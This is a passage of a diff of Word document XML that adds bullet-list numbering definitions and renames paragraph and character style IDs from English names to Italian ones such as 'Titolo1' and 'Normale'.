+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="695E02A4"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="1B76F0F0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6CDF7FB3"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="7084172C"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="405763203">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="62338613">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="993728766">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="761143267">
+    <w:abstractNumId w:val="1"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:lvl w:ilvl="0">
+        <w:numFmt w:val="bullet"/>
+        <w:lvlText w:val="o"/>
+        <w:lvlJc w:val="left"/>
+        <w:pPr>
+          <w:tabs>
+            <w:tab w:val="num" w:pos="720"/>
+          </w:tabs>
+          <w:ind w:left="720" w:hanging="360"/>
+        </w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:lvl>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="340402470">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="840893291">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1137642995">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1901280077">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1505129166">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="1966766617">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="993728766">
+  <w:num w:numId="11" w16cid:durableId="1079909917">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="1981299414">
+    <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1699313517">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="998113943">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="2034728165">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="1215310160">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>
@@ -1014,15 +5022,15 @@
     <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normale">
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading1">
+  <w:style w:type="paragraph" w:styleId="Titolo1">
     <w:name w:val="heading 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading1Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo1Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="00676D58"/>
@@ -1039,11 +5047,11 @@
       <w:szCs w:val="40"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading2">
+  <w:style w:type="paragraph" w:styleId="Titolo2">
     <w:name w:val="heading 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading2Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo2Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1062,11 +5070,11 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading3">
+  <w:style w:type="paragraph" w:styleId="Titolo3">
     <w:name w:val="heading 3"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading3Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo3Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1085,11 +5093,11 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading4">
+  <w:style w:type="paragraph" w:styleId="Titolo4">
     <w:name w:val="heading 4"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading4Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo4Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1108,11 +5116,11 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading5">
+  <w:style w:type="paragraph" w:styleId="Titolo5">
     <w:name w:val="heading 5"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading5Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo5Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1129,11 +5137,11 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading6">
+  <w:style w:type="paragraph" w:styleId="Titolo6">
     <w:name w:val="heading 6"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading6Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo6Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1152,11 +5160,11 @@
       <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading7">
+  <w:style w:type="paragraph" w:styleId="Titolo7">
     <w:name w:val="heading 7"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading7Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo7Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1173,11 +5181,11 @@
       <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading8">
+  <w:style w:type="paragraph" w:styleId="Titolo8">
     <w:name w:val="heading 8"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading8Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo8Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1196,11 +5204,11 @@
       <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading9">
+  <w:style w:type="paragraph" w:styleId="Titolo9">
     <w:name w:val="heading 9"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:link w:val="Heading9Char"/>
+    <w:basedOn w:val="Normale"/>
+    <w:next w:val="Normale"/>
+    <w:link w:val="Titolo9Carattere"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -1217,12 +5225,12 @@
       <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+  <w:style w:type="character" w:default="1" w:styleId="Carpredefinitoparagrafo">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
+  <w:style w:type="table" w:default="1" w:styleId="Tabellanormale">
     <w:name w:val="Normal Table"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
@@ -1237,16 +5245,16 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
+  <w:style w:type="numbering" w:default="1" w:styleId="Nessunelenco">
     <w:name w:val="No List"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
-    <w:name w:val="Heading 1 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading1"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo1Carattere">
+    <w:name w:val="Titolo 1 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo1"/>
     <w:uiPriority w:val="9"/>
     <w:rsid w:val="00676D58"/>
     <w:rPr>
@@ -1256,10 +5264,10 @@
       <w:szCs w:val="40"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
-    <w:name w:val="Heading 2 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading2"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo2Carattere">
+    <w:name w:val="Titolo 2 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo2"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1270,10 +5278,10 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
-    <w:name w:val="Heading 3 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading3"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo3Carattere">
+    <w:name w:val="Titolo 3 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo3"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1284,10 +5292,10 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
-    <w:name w:val="Heading 4 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading4"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo4Carattere">
+    <w:name w:val="Titolo 4 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo4"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1298,10 +5306,10 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
-    <w:name w:val="Heading 5 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading5"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo5Carattere">
+    <w:name w:val="Titolo 5 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo5"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1310,10 +5318,10 @@
       <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
-    <w:name w:val="Heading 6 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading6"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo6Carattere">
+    <w:name w:val="Titolo 6 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo6"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1324,10 +5332,10 @@
       <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
-    <w:name w:val="Heading 7 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading7"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo7Carattere">
+    <w:name w:val="Titolo 7 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo7"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1336,10 +5344,10 @@
       <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
-    <w:name w:val="Heading 8 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading8"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo8Carattere">
+    <w:name w:val="Titolo 8 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo8"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1350,10 +5358,10 @@
       <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
-    <w:name w:val="Heading 9 Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Heading9"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo9Carattere">
+    <w:name w:val="Titolo 9 Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Titolo9"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="00676D58"/>
@@ -1362,11 +5370,11 @@
       <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Title">
+  <w:style w:type="paragraph" w:styleId="Titolo">
     <w:name w:val="Title"/>
-    <w:basedOn w:val="Normal"/>
